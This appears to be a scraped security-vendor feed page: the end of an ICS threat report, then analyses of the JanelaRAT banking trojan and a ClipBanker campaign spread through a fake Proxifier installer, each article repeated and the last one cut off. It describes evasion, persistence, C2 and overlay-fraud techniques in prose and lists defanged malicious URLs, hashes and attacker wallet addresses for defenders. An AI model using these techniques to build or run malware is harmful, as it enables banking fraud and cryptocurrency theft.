In Q4 2025, the percentage of ICS computers on which worms were blocked increased by 1.6 times to 1.60%. As mentioned above, this increase is related to a global phishing attack that spread the Backdoor.MSIL.XWorm backdoor worm across all regions of the world. The percentage increased in all regions. The biggest increase (up by 2.16 times) was in Southern Europe. The malware was primary distributed through email clients, and Southern Europe led the way in terms of the percentage of ICS computers on which threats from email clients were blocked.

The percentage of ICS computers on which viruses were blocked decreased to 1.33%.

AutoCAD malware

This category of malware can spread in a variety of ways, so it does not belong to a specific group.

After an increase in the previous quarter, the percentage of ICS computers on which AutoCAD malware was blocked decreased to 0.29% in Q4 2025.

For more information on industrial threats see the full version of the report.

  •  

JanelaRAT: a financial threat targeting users in Latin America

Background

JanelaRAT is a malware family that takes its name from the Portuguese word “janela” which means “window”. JanelaRAT looks for financial and cryptocurrency data from specific banks and financial institutions in the Latin America region.

JanelaRAT is a modified variant of BX RAT that has targeted users since June 2023. One of the key differences between these Trojans is that JanelaRAT uses a custom title bar detection mechanism to identify desired websites in victims’ browsers and perform malicious actions.

The threat actors behind JanelaRAT campaigns continuously update the infection chain and malware versions by adding new features.

Kaspersky solutions detect this threat as Trojan.Script.Generic and Backdoor.MSIL.Agent.gen.

Initial infection

JanelaRAT campaigns involve a multi-stage infection chain. It starts with emails mimicking the delivery of pending invoices to trick victims into downloading a PDF file by clicking a malicious link. Then the victims are redirected to a malicious website from which a compressed file is downloaded.

Malicious email used in JanelaRAT campaigns

Malicious email used in JanelaRAT campaigns

Throughout our monitoring of these malware campaigns, the compressed files have typically contained VBScripts, XML files, other ZIP archives, and BAT files. They ultimately lead to downloading a ZIP archive that contains components for DLL sideloading and executing JanelaRAT as the final payload.

However, we have observed variations in the infection chains depending on the delivered version of the malware. The latest observed campaign evolved by integrating MSI files to deliver a legitimate PE32 executable and a DLL, which is then sideloaded by the executable. This DLL is actually JanelaRAT, delivered as the final payload.

Based on our analysis of previous JanelaRAT intrusions, the updates in the infection chain represent threat actors’ attempts to streamline the process, with a reduced number of malware installation steps. We’ve observed a logical sequence in how components, such as MSI files, have been incorporated and adapted over time. Moreover, we have observed the use of auxiliary files — additional components that aid in the infection — such as configuration files that have been changing over time, showing how the threat actors have adapted these infections in an effort to avoid detection.

JanelaRAT infection flow evolution

JanelaRAT infection flow evolution

Initial dropper

The MSI file acts as an initial dropper designed to install the final implant and establish persistence on the system. It obfuscates file paths and names with the objective to hinder analysis. This code is designed to create several ActiveX objects to manipulate the file system and execute malicious commands.

Among the actions taken, the MSI defines paths based on environment variables for hosting binaries, creating a startup shortcut, and storing a first-run indicator file. The dropper file checks for the existence of the latter and for a specific path, and if either is missing, it creates them. If the file exists, the MSI file redirects the user to an external website as a decoy, showing that everything is “normal”.

The MSI dropper places two files at a specified path: the legitimate executable nevasca.exe and the PixelPaint.dll library, renaming them with obfuscated combinations of random strings before relocating. An LNK shortcut is created in the user’s Startup folder, pointing to the renamed nevasca.exe executable, ensuring persistence. Finally, the nevasca.exe file is executed, which in turn loads the PixelPaint.dll file that is JanelaRAT.

Malicious implant

In this case, we analyzed JanelaRAT version 33, which was masqueraded as a legitimate pixel art app. Similar to other malware versions, it was protected with Eazfuscator, a common .NET obfuscation tool. We have also seen previous JanelaRAT samples that used the ConfuserEx obfuscator or its custom builds. The malware uses Control Flow Flattening method and renames classes and variables to make the code unreadable without deobfuscation.

JanelaRAT monitors the victim’s activity, intercepts sensitive banking interactions, and establishes an interactive C2 channel to report changes to the threat actor. While screen monitoring is also present, the core functionality focuses on financial fraud and real-time manipulation of the victim’s machine. The malware collects system information, including OS version, processor architecture (32-bit, 64-bit, or unknown), username, and machine name. The Trojan evaluates the current user’s privilege level and assigns different nicknames for administrators, users, guests, and an additional one for any other role.

The malware then retrieves the current date and constructs a beacon to register the victim on the C2 server, along with the malware version. To prevent multiple instances, the malware creates the mutex and exits if it already exists.

String encryption

All JanelaRAT samples utilize encrypted strings for sending information to the C2 and obfuscating embedded data. The encryption algorithm remains consistent across campaigns, combining base64 encoding with Rijndael (AES). The encryption key is derived from the MD5 hash of a 4-digit number and the IV is composed of the first 16 bytes of the decoded base64 data.

C2 communication and command handling

After initialization, JanelaRAT establishes a TCP socket, configuring callbacks for connection events and message handling. It registers all known message types, executing specific system tasks based on the received message.

Following socket initialization, the malware launches two background routines:

  1. User inactivity and session tracking
    This routine activates timers and launches secondary threads, including an internal timer and a user inactivity monitor. The malware determines if the victim’s machine has been inactive for more than 10 minutes by calculating the elapsed time since the last user input. If the inactivity period exceeds 10 minutes, the malware notifies the C2 by sending the corresponding message. Upon user activity, it notifies the threat actor again. This makes it possible to track the user’s presence and routine to time possible remote operations.

    Timer that looks for 10 minutes of inactivity

    Timer that looks for 10 minutes of inactivity

  2. Victim registration and further malicious activity
    This routine is launched immediately after the socket setup. It triggers two subroutines responsible for periodic HTTP beaconing and downloading additional payloads.
    1. The first subroutine executes a PowerShell downloaded from a staging server during post-exploitation. Its main objective is to establish persistence by downloading the PixelPaint.dll file once again. The routine then builds and executes periodic HTTP requests to the C2, reporting the malware’s version and the victim machine’s security environment. It loops continuously as long as a specific local file does not exist, ensuring repeated telemetry transmission. The file was not observed being extracted or created by the malware itself; rather, it appears to be placed on the system by the threat actor during other post-exploitation activities. Based on previous incidents, this file likely contains instructions for establishing persistence.

      This JanelaRAT version constructs a second C2 URL for beaconing, using several decrypted strings and following a pattern that uses different parameters to report information about new victims:

      <C2Domain>?VS=<malwareversion>&PL=<profilelevel>&AN=<presenceofbankingsoftware>

      We have observed constant changes in the parameters across campaigns. A new parameter “AN” was introduced in this version. It is used to detect the presence of a specific process associated with banking security software. If such software is found on the victim’s device, the malware notifies the threat actor.

      Parameter Description
      VS JanelaRAT version
      PL OFF by default
      AN Yes or No depending on whether banking security software process exists
    2. The second subroutine is responsible for monitoring the user’s visits to banking websites and reporting any activity of interest to the threat actor. JanelaRAT 33v is specifically engineered to target Brazilian financial institutions. However, we have also observed other versions of the malware targeting other specific countries in the region, such as the “Gold-Label” version targeting banking users in Mexico that we described earlier.

      This subroutine creates a timer to enable an active system monitoring cycle. During this cycle, the malware obtains the title of the active window and checks if it matches entries of interest using a hardcoded but obfuscated list of financial institutions. Although the threat actors behind JanelaRAT primarily focus on one country as a target, the list of financial institutions is constantly updated.

      If a title bar matches one of the listed targets, the malware waits 12 seconds before establishing a dedicated communication channel to the C2. This channel is used to execute malicious tasks, including taking screenshots, monitoring keyboard and mouse input, displaying messages to the user, injecting keystrokes or simulating mouse input, and forcing system shutdown.

      To perform these actions, the malware uses a dedicated C2 handler that interprets incoming commands from the C2. Notably, 33v supports live banking session hijacking, not just credential theft.

      Action Performed Description
      Capture desktop image Send compressed screenshots to the C2
      Specific screenshots Crop specific screen regions and exfiltrate images
      Overlay windows Display images in full-screen mode, limit user interactions, and mimic bank dialogs to harvest credentials
      Keylogging Keystroke capture
      Simulate keyboard Inject keys such as DOWN, UP, and TAB to navigate or trigger new elements
      Track mouse input Move the cursor, simulate clicks, and report the cursor position
      Display message Show message boxes (custom title, text, buttons, or icons)
      System shutdown Execute a forced shutdown sequence
      Command execution Run CMD or PowerShell scripts/commands
      Task Manager
      manipulation
      Launch Task Manager, find its window, and hide it to prevent discovery by the user
      Check for banking security software process Detect the presence of anti-fraud systems
      Beaconing Send host information (malware version, profile, presence of banking software)
      Toggle internal modes Enable and disable modes such as screenshot flow, key injection, or overlay visibility
      Anti-analysis Detect sandbox or automation tools

C2 infrastructure

Unlike other versions, this variant rotates its C2 server daily. Once a title bar matches the one in the list, the software dynamically constructs the C2 channel domain by concatenating an obfuscated string, the current date, and a suffix domain related to a legitimate dynamic DNS (DDNS) service. This communication is established using port 443, but not TLS.

Decoy overlay system

This version of JanelaRAT implements a decoy overlay system designed to capture banking credentials and bypass multi-factor authentication. When a target banking window is detected, the malware requests further instructions from the C2 server. The C2 responds with a command identifier and a Base64-encoded image, which is then displayed as a full-screen overlay window mimicking legitimate banking or system interfaces. The malware ensures the fake window completely covers the screen and limits the victim’s interaction with the system.

The malware blocks the victim’s interaction by displaying modal dialogs. Each modal dialog corresponds to a specific operation, such as password capture, token/MFA capture, fake loading screen, fake Windows update full-screen modal and more. The malware resizes the overlay, scans multiple screens, and loads deceptive elements to distract the user or temporarily hide legitimate application windows.

Among other fake elements, the malware displays fake Windows update notifications, often accompanied by messages in Brazilian Portuguese, such as:

  • “Configuring Windows updates, please wait.”
  • “Do not turn off your computer; this could take some time.”

When a message command is received from the operator, the malware constructs a custom message box based on parameters sent from the server. These parameters include the message title, text content, button type (e.g., OK, Yes/No), and icon type (e.g., Warning, Error). The malware then creates a maximized message box positioned at the top of the screen, ensuring it captures user focus and blocks the visibility of other windows, mimicking a system or security alert.

An obfuscated acknowledgement string is sent back to the C2 to confirm successful execution of this task.

Anti-analysis techniques

In addition to the conditional behavior based on whether the process of banking security software is detected, the malware includes anti-analysis routines and computer environment checks, such as sandbox detection through the Magnifier and MagnifierWindow components. These components are used to determine if accessibility tools are active on the infected computer indicating a possible malware analysis environment.

Persistence

The malware establishes persistence by writing a command script into the Windows Startup directory. This script forces the execution chain to run at each user logon enabling malicious activity without triggering privilege escalation prompts. The script is executed silently to evade user awareness.

This method is either an alternative or a supplement to the persistence method previously described in the subroutines responsible for periodic HTTP beaconing section.

Victimology

Consistent with previous intrusions and campaigns, the primary targets of the threat actors distributing JanelaRAT are banking users in Latin America, with specific focus on users of financial institutions in Brazil and Mexico.

According to our telemetry, in 2025 we detected 14,739 attacks in Brazil and 11,695 in Mexico related to JanelaRAT.

Conclusions

JanelaRAT remains an active and evolving threat, with intrusions exhibiting consistent characteristics despite ongoing modifications. We have tracked the evolution of JanelaRAT infections for some time, observing variations in both the malware itself and its infection chain, including targeted variants for specific countries.

This variant represents a significant advancement in the actor’s capabilities, combining multiple communication channels, comprehensive victim monitoring, interactive overlays, input injection, and robust remote control features. The malware is specifically designed to minimize user visibility and adapt its behavior upon detection of anti-fraud software.

To mitigate the risk of communication with the C2 infrastructure utilizing similar evasive techniques, we recommend that defenders block dynamic DNS services at the corporate perimeter or internal DNS resolvers. This will disrupt the communication channels used by JanelaRAT and similar threats.

Indicators of compromise

808c87015194c51d74356854dfb10d9e         MSI Dropper
d7a68749635604d6d7297e4fa2530eb6        JanelaRAT
ciderurginsx[.]com         Primary C2

  •  

JanelaRAT: a financial threat targeting users in Latin America

Background

JanelaRAT is a malware family that takes its name from the Portuguese word “janela” which means “window”. JanelaRAT looks for financial and cryptocurrency data from specific banks and financial institutions in the Latin America region.

JanelaRAT is a modified variant of BX RAT that has targeted users since June 2023. One of the key differences between these Trojans is that JanelaRAT uses a custom title bar detection mechanism to identify desired websites in victims’ browsers and perform malicious actions.

The threat actors behind JanelaRAT campaigns continuously update the infection chain and malware versions by adding new features.

Kaspersky solutions detect this threat as Trojan.Script.Generic and Backdoor.MSIL.Agent.gen.

Initial infection

JanelaRAT campaigns involve a multi-stage infection chain. It starts with emails mimicking the delivery of pending invoices to trick victims into downloading a PDF file by clicking a malicious link. Then the victims are redirected to a malicious website from which a compressed file is downloaded.

Malicious email used in JanelaRAT campaigns

Malicious email used in JanelaRAT campaigns

Throughout our monitoring of these malware campaigns, the compressed files have typically contained VBScripts, XML files, other ZIP archives, and BAT files. They ultimately lead to downloading a ZIP archive that contains components for DLL sideloading and executing JanelaRAT as the final payload.

However, we have observed variations in the infection chains depending on the delivered version of the malware. The latest observed campaign evolved by integrating MSI files to deliver a legitimate PE32 executable and a DLL, which is then sideloaded by the executable. This DLL is actually JanelaRAT, delivered as the final payload.

Based on our analysis of previous JanelaRAT intrusions, the updates in the infection chain represent threat actors’ attempts to streamline the process, with a reduced number of malware installation steps. We’ve observed a logical sequence in how components, such as MSI files, have been incorporated and adapted over time. Moreover, we have observed the use of auxiliary files — additional components that aid in the infection — such as configuration files that have been changing over time, showing how the threat actors have adapted these infections in an effort to avoid detection.

JanelaRAT infection flow evolution

JanelaRAT infection flow evolution

Initial dropper

The MSI file acts as an initial dropper designed to install the final implant and establish persistence on the system. It obfuscates file paths and names with the objective to hinder analysis. This code is designed to create several ActiveX objects to manipulate the file system and execute malicious commands.

Among the actions taken, the MSI defines paths based on environment variables for hosting binaries, creating a startup shortcut, and storing a first-run indicator file. The dropper file checks for the existence of the latter and for a specific path, and if either is missing, it creates them. If the file exists, the MSI file redirects the user to an external website as a decoy, showing that everything is “normal”.

The MSI dropper places two files at a specified path: the legitimate executable nevasca.exe and the PixelPaint.dll library, renaming them with obfuscated combinations of random strings before relocating. An LNK shortcut is created in the user’s Startup folder, pointing to the renamed nevasca.exe executable, ensuring persistence. Finally, the nevasca.exe file is executed, which in turn loads the PixelPaint.dll file that is JanelaRAT.

Malicious implant

In this case, we analyzed JanelaRAT version 33, which was masqueraded as a legitimate pixel art app. Similar to other malware versions, it was protected with Eazfuscator, a common .NET obfuscation tool. We have also seen previous JanelaRAT samples that used the ConfuserEx obfuscator or its custom builds. The malware uses Control Flow Flattening method and renames classes and variables to make the code unreadable without deobfuscation.

JanelaRAT monitors the victim’s activity, intercepts sensitive banking interactions, and establishes an interactive C2 channel to report changes to the threat actor. While screen monitoring is also present, the core functionality focuses on financial fraud and real-time manipulation of the victim’s machine. The malware collects system information, including OS version, processor architecture (32-bit, 64-bit, or unknown), username, and machine name. The Trojan evaluates the current user’s privilege level and assigns different nicknames for administrators, users, guests, and an additional one for any other role.

The malware then retrieves the current date and constructs a beacon to register the victim on the C2 server, along with the malware version. To prevent multiple instances, the malware creates the mutex and exits if it already exists.

String encryption

All JanelaRAT samples utilize encrypted strings for sending information to the C2 and obfuscating embedded data. The encryption algorithm remains consistent across campaigns, combining base64 encoding with Rijndael (AES). The encryption key is derived from the MD5 hash of a 4-digit number and the IV is composed of the first 16 bytes of the decoded base64 data.

C2 communication and command handling

After initialization, JanelaRAT establishes a TCP socket, configuring callbacks for connection events and message handling. It registers all known message types, executing specific system tasks based on the received message.

Following socket initialization, the malware launches two background routines:

  1. User inactivity and session tracking
    This routine activates timers and launches secondary threads, including an internal timer and a user inactivity monitor. The malware determines if the victim’s machine has been inactive for more than 10 minutes by calculating the elapsed time since the last user input. If the inactivity period exceeds 10 minutes, the malware notifies the C2 by sending the corresponding message. Upon user activity, it notifies the threat actor again. This makes it possible to track the user’s presence and routine to time possible remote operations.

    Timer that looks for 10 minutes of inactivity

    Timer that looks for 10 minutes of inactivity

  2. Victim registration and further malicious activity
    This routine is launched immediately after the socket setup. It triggers two subroutines responsible for periodic HTTP beaconing and downloading additional payloads.
    1. The first subroutine executes a PowerShell downloaded from a staging server during post-exploitation. Its main objective is to establish persistence by downloading the PixelPaint.dll file once again. The routine then builds and executes periodic HTTP requests to the C2, reporting the malware’s version and the victim machine’s security environment. It loops continuously as long as a specific local file does not exist, ensuring repeated telemetry transmission. The file was not observed being extracted or created by the malware itself; rather, it appears to be placed on the system by the threat actor during other post-exploitation activities. Based on previous incidents, this file likely contains instructions for establishing persistence.

      This JanelaRAT version constructs a second C2 URL for beaconing, using several decrypted strings and following a pattern that uses different parameters to report information about new victims:

      <C2Domain>?VS=<malwareversion>&PL=<profilelevel>&AN=<presenceofbankingsoftware>

      We have observed constant changes in the parameters across campaigns. A new parameter “AN” was introduced in this version. It is used to detect the presence of a specific process associated with banking security software. If such software is found on the victim’s device, the malware notifies the threat actor.

      Parameter Description
      VS JanelaRAT version
      PL OFF by default
      AN Yes or No depending on whether banking security software process exists
    2. The second subroutine is responsible for monitoring the user’s visits to banking websites and reporting any activity of interest to the threat actor. JanelaRAT 33v is specifically engineered to target Brazilian financial institutions. However, we have also observed other versions of the malware targeting other specific countries in the region, such as the “Gold-Label” version targeting banking users in Mexico that we described earlier.

      This subroutine creates a timer to enable an active system monitoring cycle. During this cycle, the malware obtains the title of the active window and checks if it matches entries of interest using a hardcoded but obfuscated list of financial institutions. Although the threat actors behind JanelaRAT primarily focus on one country as a target, the list of financial institutions is constantly updated.

      If a title bar matches one of the listed targets, the malware waits 12 seconds before establishing a dedicated communication channel to the C2. This channel is used to execute malicious tasks, including taking screenshots, monitoring keyboard and mouse input, displaying messages to the user, injecting keystrokes or simulating mouse input, and forcing system shutdown.

      To perform these actions, the malware uses a dedicated C2 handler that interprets incoming commands from the C2. Notably, 33v supports live banking session hijacking, not just credential theft.

      Action Performed Description
      Capture desktop image Send compressed screenshots to the C2
      Specific screenshots Crop specific screen regions and exfiltrate images
      Overlay windows Display images in full-screen mode, limit user interactions, and mimic bank dialogs to harvest credentials
      Keylogging Keystroke capture
      Simulate keyboard Inject keys such as DOWN, UP, and TAB to navigate or trigger new elements
      Track mouse input Move the cursor, simulate clicks, and report the cursor position
      Display message Show message boxes (custom title, text, buttons, or icons)
      System shutdown Execute a forced shutdown sequence
      Command execution Run CMD or PowerShell scripts/commands
      Task Manager
      manipulation
      Launch Task Manager, find its window, and hide it to prevent discovery by the user
      Check for banking security software process Detect the presence of anti-fraud systems
      Beaconing Send host information (malware version, profile, presence of banking software)
      Toggle internal modes Enable and disable modes such as screenshot flow, key injection, or overlay visibility
      Anti-analysis Detect sandbox or automation tools

C2 infrastructure

Unlike other versions, this variant rotates its C2 server daily. Once a title bar matches the one in the list, the software dynamically constructs the C2 channel domain by concatenating an obfuscated string, the current date, and a suffix domain related to a legitimate dynamic DNS (DDNS) service. This communication is established using port 443, but not TLS.

Decoy overlay system

This version of JanelaRAT implements a decoy overlay system designed to capture banking credentials and bypass multi-factor authentication. When a target banking window is detected, the malware requests further instructions from the C2 server. The C2 responds with a command identifier and a Base64-encoded image, which is then displayed as a full-screen overlay window mimicking legitimate banking or system interfaces. The malware ensures the fake window completely covers the screen and limits the victim’s interaction with the system.

The malware blocks the victim’s interaction by displaying modal dialogs. Each modal dialog corresponds to a specific operation, such as password capture, token/MFA capture, fake loading screen, fake Windows update full-screen modal and more. The malware resizes the overlay, scans multiple screens, and loads deceptive elements to distract the user or temporarily hide legitimate application windows.

Among other fake elements, the malware displays fake Windows update notifications, often accompanied by messages in Brazilian Portuguese, such as:

  • “Configuring Windows updates, please wait.”
  • “Do not turn off your computer; this could take some time.”

When a message command is received from the operator, the malware constructs a custom message box based on parameters sent from the server. These parameters include the message title, text content, button type (e.g., OK, Yes/No), and icon type (e.g., Warning, Error). The malware then creates a maximized message box positioned at the top of the screen, ensuring it captures user focus and blocks the visibility of other windows, mimicking a system or security alert.

An obfuscated acknowledgement string is sent back to the C2 to confirm successful execution of this task.

Anti-analysis techniques

In addition to the conditional behavior based on whether the process of banking security software is detected, the malware includes anti-analysis routines and computer environment checks, such as sandbox detection through the Magnifier and MagnifierWindow components. These components are used to determine if accessibility tools are active on the infected computer indicating a possible malware analysis environment.

Persistence

The malware establishes persistence by writing a command script into the Windows Startup directory. This script forces the execution chain to run at each user logon enabling malicious activity without triggering privilege escalation prompts. The script is executed silently to evade user awareness.

This method is either an alternative or a supplement to the persistence method previously described in the subroutines responsible for periodic HTTP beaconing section.

Victimology

Consistent with previous intrusions and campaigns, the primary targets of the threat actors distributing JanelaRAT are banking users in Latin America, with specific focus on users of financial institutions in Brazil and Mexico.

According to our telemetry, in 2025 we detected 14,739 attacks in Brazil and 11,695 in Mexico related to JanelaRAT.

Conclusions

JanelaRAT remains an active and evolving threat, with intrusions exhibiting consistent characteristics despite ongoing modifications. We have tracked the evolution of JanelaRAT infections for some time, observing variations in both the malware itself and its infection chain, including targeted variants for specific countries.

This variant represents a significant advancement in the actor’s capabilities, combining multiple communication channels, comprehensive victim monitoring, interactive overlays, input injection, and robust remote control features. The malware is specifically designed to minimize user visibility and adapt its behavior upon detection of anti-fraud software.

To mitigate the risk of communication with the C2 infrastructure utilizing similar evasive techniques, we recommend that defenders block dynamic DNS services at the corporate perimeter or internal DNS resolvers. This will disrupt the communication channels used by JanelaRAT and similar threats.

Indicators of compromise

808c87015194c51d74356854dfb10d9e         MSI Dropper
d7a68749635604d6d7297e4fa2530eb6        JanelaRAT
ciderurginsx[.]com         Primary C2

  •  

The long road to your crypto: ClipBanker and its marathon infection chain

At the start of the year, a certain Trojan caught our eye due to its incredibly long infection chain. In most cases, it kicks off with a web search for “Proxifier”. Proxifiers are speciaized software designed to tunnel traffic for programs that do not natively support proxy servers. They are a go-to for making sure these apps are functional within secured development environments.

By coincidence, Proxifier is also a name for a proprietary proxifier developed by VentoByte, which is distributed under a paid license.

If you search for Proxifier (or a proxifier), one of the top results in popular search engines is a link to a GitHub repository. That’s exactly where the source of the primary infection lives.

The GitHub project itself contains the source code for a rudimentary proxy service. However, if you head over to the Releases section, you’ll find an archive containing an executable file and a text document. That executable is actually a malicious wrapper bundled around the legitimate Proxifier installer, while the text file helpfully offers activation keys for the software.

Once launched, the Trojan’s first order of business is to add an exception to Microsoft Defender for all files with a TMP extension, as well as for the directory where the executable is sitting. The way the Trojan pulls this off is actually pretty exotic.

First, it creates a tiny stub file – only about 1.5 KB in size – in the temp directory under the name “Proxifier<???>.tmp” and runs it. This stub doesn’t actually do anything on its own; it serves as a donor process. Later, a .NET application named “api_updater.exe” is injected into it to handle the Microsoft Defender exclusions. To get this done, api_updater.exe decrypts and runs a PowerShell script using the PSObject class. PSObject lets the script run directly inside the current process without popping up a command console or launching the interpreter.

As soon as the required exclusions are set, the trojanized proxifier.exe extracts and launches the real Proxifier installer. Meanwhile, it quietly continues the infection in the background: it creates another donor process and injects a module named proxifierupdater.exe. This module acts as yet another injector. It launches the system utility conhost.exe and injects it with another .NET app, internally named “bin.exe”, which runs a PowerShell script using the same method as before.

The script is obfuscated and parts of it are encoded, but it really only performs four specific actions:

  • Add the “powershell” and “conhost” processes to Microsoft Defender exclusions.
  • Create a registry key at HKLM\SOFTWARE\System::Config and store another Base64-encoded PowerShell script inside it.
  • Set up a scheduled task to launch PowerShell with another script as an argument. The script’s task is to read the content of the created registry key, decode it, and transfer control to the resulting script.
  • Ping an IP Logger service at https[:]//maper[.]info/2X5tF5 to let the attackers know the infection was successful.

This wraps up the primary stage of the infection. As you can see, the Trojan attempts to use fileless (or bodiless) malware techniques. By executing malicious code directly in allocated memory, it leaves almost no footprint on the hard drive.

The next stage is launched along with the task created in the scheduler. This is what it looks like:

The task launches the PowerShell interpreter, passing the script from the arguments as input. As we already mentioned, it reads the contents of the previously created Config registry key, then decodes and executes it. This is yet another PowerShell script whose job is to download the next script from hardcoded addresses and execute it. These addresses belong to Pastebin-type services, and the content located there is encoded in several different ways at once.

Decoded and deobfuscated script from the Config registry key

Decoded and deobfuscated script from the Config registry key

The script from Pastebin continues the download chain. This time, the payload is located on GitHub.

Decoded script from Pastebin

Decoded script from Pastebin

It’s a massive script, clocking in at around 500 KB. Interestingly, the bulk of the file is just one long Base64 string. After decoding it and doing some deobfuscation, we end up with a script whose purpose is quite clear. It extracts shellcode from a Base64 string, launches the fontdrvhost.exe utility, injects the shellcode into it, and hands over control.

The shellcode, in turn, unpacks and sets up the code for the final payload. This is classic ClipBanker-like malware, and there’s nothing particularly fancy about it. It’s written in C++, compiled with MinGW, doesn’t bother with system persistence, and doesn’t even connect to the network. Its entire job is to constantly monitor the clipboard for strings that look like crypto wallet addresses belonging to various blockchain-based networks (Cardano, Algorand, Ethereum, Bitcoin, NEM, Stellar, BNB, Cosmos, Dash, Monero, Dogecoin, MultiversX, Arweave, Filecoin, Litecoin, Neo, Osmosis, Solana, THOR, Nano, Qtum, Waves, TRON, Ripple, Tezos, and ZelCash), and then swap them with the attackers’ own addresses.

Here is the full list of replacement addresses:

addr1qxenj0dwefgmp9z4t4dgek3yh3d8cfzcl6u97x2ln8c4nljjv7xdw2u0jhfdy90arm0xr0das4kznrh8qj33dzu8z5fqdtusyt
QSAROFQNKPXKKDNK67N5MQY5IQ4MTKGLI65KREVHKW53R2M6WHORP3ME2E
0x97c16182d2e91a9370d5590b670f6b8dc755680552e40218a2b28ec7ad105071
qrherxuw7fupud48l9xwvdcg7w64g8g7xvls9vgqyq
bc1q88r38gk8ynrhdfur7yefwf5hrn2y56s90vlrvq
36vf1gvZSxHkRRhAFiH6fotVWYEwH3tk22
14U9sBVDRyEfPgR8h9QJatwtrodey4NeH4
bc1phfm9d0fpqtgr9hkrxx5ww9k2qzww59q5czga95rtmk6vh5h8devsa72fxk
btg1qqfrsueknwmg92xrpch22wru0g4ka4p2vum3pdj
AcRjmRuDswUeQHtxJnzAn496r9Lo8XQjUK
GW9DJpw4mBJnVUWucX3szdH5bXZ9pqzLRF
bnb18nqx60dx6dhhsdyddcl0653392w0v4yhx07knl
cosmos10zqq0frph0rs36wwjg4r2r5626m6a2dgv3h6nv
DskZFNcs5MKg9EdvhAnu87YGzWwVoBvd2tZ
Xj3KofSCPq97odR8hiFjfeZs2FqbwUbstk
DJYXgJuBrc7cuGn4sgJXz1sdArKURkoWS9
erd14n38wkxm9epjh0s2y8078yqqzy4ztq9ckczy883dwcfgd54peaqs3tp2k2
a2dB176hgduQopnJPrEGjfojRWSHwTS62Q
f1qxoyqf3va2mwfbgzah3t7pqe7x5fmdev5dqc25a
inj1qw709q8utgjhxrs2cqczhmz2w254dedllzmlef
ltc1q4calyk5x5g36ckpsrcr6ndtxdlc0ea9qs4h44n
MCB8j9kXkX3f3BoXaBcsDc9RFoki9Kb3AR
LhMGEmEGwxcGhCEQ7QmbC1hywRbHbbv6p8
14FBxuV8HEuuWPFoFHbbG4Hm4pa7CqroQiGDeWvZdGiiJm8W
osmo10zqq0frph0rs36wwjg4r2r5626m6a2dgy2y297
7ATuKGME8AG9Tz5Qe4eRf1EAwqJNUvYXMiCGmtSbaJXR
thor12x0nqpjz2djpuaxm2j2z963sawdcze3nhxacyu
EQA28DFYnisowE0e49Sp2DUv6RKQWOJGbvegKWRPXE83bMnQ
nano_1j9mjyi4q8qytb1r7yyqntzkyay5xo1wznnwmy9a3p9r371zb3d6wr6xs8y5
QXwbqRnmxgmMZQk5WEvMYEBVzf1MP4eMY9
3P7zSKMhfMPr5kd85xtHNmCx2gi9apCgnSP
TNkGLYwtjcSk2A9U8cxJzttGeGEgz56hSP
GB4XWREV3WOXWIWFE3DVX3FUNUXLOC7EEGXHZXRUKI5AMZAG3SV7EV4P
46QtL5btfnq85iGrPDFabp4mxGhRbEZJaH67i5LhQsWhCnuiURKVU74QbMpf4TcZqgDnENMWaqhpt82vQSEdyBf4Tp1v8Y9
rKwSuwgNNWn8P8x1ckUopKkErnPW3tVrz9
tz1cPNzMxTsLzV1Gca2VowGgjRm7MkRzGLw5
t1Nwwai9UsQxcgJVVbssnmfjfznhbq2v8ud
ZEPHYR2tzMbbkY7CCsShtADqstJLEeZfEiDHQeRchSg8FoqAn2XzsDD8eEEx5cweBQb4jX12DhfPz36c6TD6uV9fPrcFMqwzTn93Y

The complete execution chain, from the moment the malicious installer starts until the ClipBanker code is running, looks like this:

Victims

Since the beginning of 2025, more than 2000 users of Kaspersky solutions have encountered this threat, most of them located in India and Vietnam. Interestingly, 70% of these detections came from the Kaspersky Virus Removal Tool, a free utility used to clean devices that are already infected. This underscores the importance of the preemptive protection: it is often cheaper and easier to prevent the infection than to face consequences of a successful attack.

Conclusion

This campaign is yet another perfect example of the old adage: “buy cheap, pay twice”. Trying to save a buck on software, combined with a lack of caution when hunting for free solutions, can lead to an infection and the subsequent theft of funds – in this case, cryptocurrency. The attackers are aggressively promoting their sites in search results and using fileless techniques alongside a marathon infection chain to stay under the radar. Such attacks are difficult to detect and stop in time.

To stay safe and avoid losing your money, use reliable security solutions that are able to prevent your device form being infected. Download software only from official sources. If for some reason you can’t use a reputable paid solution, we highly recommend thoroughly vetting the sites you use to download software.

Indicators of compromise

URLs
https[:]//pastebin[.]com/raw/FmpsDAtQ
https[:]//snippet[.]host/aaxniv/raw
https[:]//chiaselinks[.]com/raw/nkkywvmhux
https[:]//rlim[.]com/55Dfq32kaR/raw
https[:]//paste.kealper[.]com/raw/k3K5aPJQ
https[:]//git.parat[.]swiss/rogers7/dev-api/raw/master/cpzn
https[:]//pinhole[.]rootcode[.]ru/rogers7/dev-api/raw/master/cpzn
https[:]//github[.]com/lukecodix/Proxifier/releases/download/4.12/Proxifier.zip
https[:]//gist.github[.]com/msfcon5ol3/107484d66423cb601f418344cd648f12/raw/d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7/upxz

Hashes
34a0f70ab100c47caaba7a5c85448e3d
7528bf597fd7764fcb7ec06512e073e0
8354223cd6198b05904337b5dff7772b

  •  

The long road to your crypto: ClipBanker and its marathon infection chain

At the start of the year, a certain Trojan caught our eye due to its incredibly long infection chain. In most cases, it kicks off with a web search for “Proxifier”. Proxifiers are speciaized software designed to tunnel traffic for programs that do not natively support proxy servers. They are a go-to for making sure these apps are functional within secured development environments.

By coincidence, Proxifier is also a name for a proprietary proxifier developed by VentoByte, which is distributed under a paid license.

If you search for Proxifier (or a proxifier), one of the top results in popular search engines is a link to a GitHub repository. That’s exactly where the source of the primary infection lives.

The GitHub project itself contains the source code for a rudimentary proxy service. However, if you head over to the Releases section, you’ll find an archive containing an executable file and a text document. That executable is actually a malicious wrapper bundled around the legitimate Proxifier installer, while the text file helpfully offers activation keys for the software.

Once launched, the Trojan’s first order of business is to add an exception to Microsoft Defender for all files with a TMP extension, as well as for the directory where the executable is sitting. The way the Trojan pulls this off is actually pretty exotic.

First, it creates a tiny stub file – only about 1.5 KB in size – in the temp directory under the name “Proxifier<???>.tmp” and runs it. This stub doesn’t actually do anything on its own; it serves as a donor process. Later, a .NET application named “api_updater.exe” is injected into it to handle the Microsoft Defender exclusions. To get this done, api_updater.exe decrypts and runs a PowerShell script using the PSObject class. PSObject lets the script run directly inside the current process without popping up a command console or launching the interpreter.

